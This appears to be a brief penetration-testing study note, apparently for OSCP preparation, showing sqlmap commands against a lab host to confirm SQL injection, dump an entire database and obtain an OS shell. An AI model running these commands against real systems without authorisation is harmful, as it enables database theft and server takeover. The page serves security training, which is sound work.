SQLmap [Not Allowed in OSCP]

triangle-exclamation
circle-info

Press enter to go with default option

we want to scan with -u and specify the parameter to test using -p:

sqlmap -u http://192.168.50.19/blindsqli.php?user=1 -p user

after confirming that it is vulnerable to SQLi we can also dump entire database using --dump

sqlmap -u http://192.168.50.19/blindsqli.php?user=1 -p user --dump

Way of getting OS Shell

capture and save packet first (right click and select copy to file)

sqlmap -r post.txt -p item --os-shell --web-root "/var/www/html/tmp"

circle-info

WPScan is used for wordpress web scanning for vulnerability

https://www.kali.org/tools/wpscan/arrow-up-right

a

Last updated